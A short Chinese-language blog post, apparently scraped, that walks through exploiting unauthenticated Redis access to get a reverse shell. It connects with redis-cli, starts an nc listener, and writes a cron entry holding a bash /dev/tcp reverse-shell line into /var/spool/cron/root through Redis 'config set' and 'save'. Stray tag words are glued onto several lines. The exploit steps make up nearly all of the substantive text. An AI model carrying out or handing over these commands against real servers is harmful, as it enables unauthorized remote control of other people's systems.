Redis未受權訪問反彈shell

時間  2021-02-17
標籤 redis shell bash tcp code blog class cli file 欄目 Redis 简体版
原文   原文鏈接

Redis未受權訪問反彈shellredis

目標主機:10.104.11.178shell

攻擊機:kalibash

攻擊步驟:tcp

1.與目標主機鏈接code

root@kali:~# /usr/redis/redis-cli -h 10.104.11.178

 2.kali主機進行監聽blog

nc -l -v  -p 9999

 

3.寫入反彈shell語句class

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save

 4.反彈shell鏈接成功cli

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程